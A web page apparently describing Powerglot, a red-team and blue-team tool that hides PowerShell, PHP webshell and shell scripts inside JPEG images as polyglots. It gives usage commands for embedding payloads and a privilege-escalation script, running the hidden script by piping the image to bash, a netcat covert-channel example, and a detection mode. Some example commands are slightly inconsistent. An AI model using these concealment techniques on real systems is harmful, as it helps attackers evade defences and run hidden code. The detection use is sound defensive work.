Powerglot encodes several kind of scripts using polyglots, for example, offensive powershell scripts. It is not needed a loader to run the payload.
In red-team exercises or offensive tasks, masking of payloads is usually done by using steganography, especially to avoid network level protections, being one of the most common payloads scripts developed in powershell. Recent malware and APTs make use of some of these capabilities: APT32, APT37, Ursnif, Powload, LightNeuron/Turla, Platinum APT, Waterbug/Turla, Lokibot, The dukes (operation Ghost), Titanium, etc.
Powerglot is a multifunctional and multi-platform attack and defense tool based on polyglots. Powerglot allows to mask a script (powershell, shellscripting, php, …) mainly in a digital image, although other file formats are in progress. Unlike the usual offensive tools or malware, Powerglot does not need any loader to execute the “information hidden”, minimizing the noise on the target system.
PowerGlot has a clear utility in offensive tasks but it is also defined as a discovery and blue team tool. To our knowledge, it is the first general and complete open-source tool that allows to search for the presence of masked information with polyglots, information that could be useful to achieve persistence in a system or to hide malware (stego-malware, privilege escalation, lateral movement, reverse shell, etc.)
Features
Installation
# git clone https://github.com/mindcrypt/powerglot
# python3 powerglot
Usage & Parameters
Some examples to hide payloads using polyglots with Powerglot;
#Example 1 – Hiding a powershell/php/shell script in a JPEG image
#python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg
#python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg
#python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg
#Example 2 – Hiding a shell script (linenum.sh) for privilege escalation “hidden” in a JPEG image
#python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg
#file cat-linenum.jpg (It is a valid JPEG file)
#feh cat-lineum.jpg (The image is properly showed in an image viewer)
#We can execute the script in several ways:
a) cat cat-linenum | bash
b) chmod +x cat-linenum.jpeg; ./cat-linenum.jpeg
#Example 3 – Hiding a cover-channel wiht netcat in a JPEG image
#Attacker
#echo “nc 127.0.0.1 4444” > netcat.sh
#python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg
#nc -nvlp 4444
#Victim
#chmod +x cat-netcat.jpg | ./cat-netcat.jpg
Some examples to detect polyglots in our filesystem
#python3 powerglot.py -d ./
–= [Detecting polyglots] –=
……………………………………………………..
[Suspicious file]-[ ./cat-end-extra2.jpg ]..
[Suspicious file]-[ ./cat-end-extra3.jpg ][Polyglot Stegosploit][EOF Signature: */ –>]
………………………………………………………………………
[Suspicious file]-[ ./cat-end-extra1.jpg ]..
Future work. Doing
Author & License
This project has been developed by Dr. Alfonso Muñoz and Abraham Pasamar. The code is released under the GNU General Public License v3.
The cp command, short for "copy," is the main Linux utility for duplicating files and directories. Whether…
Introduction In digital investigations, images often hold more information than meets the eye. With the…
The cat command short for concatenate, It is a fast and versatile tool for viewing and merging…
What is a Port? A port in networking acts like a gateway that directs data…
The ls command is fundamental for anyone working with Linux. It’s used to display the files and…
The pwd (Print Working Directory) command is essential for navigating the Linux filesystem. It instantly shows your…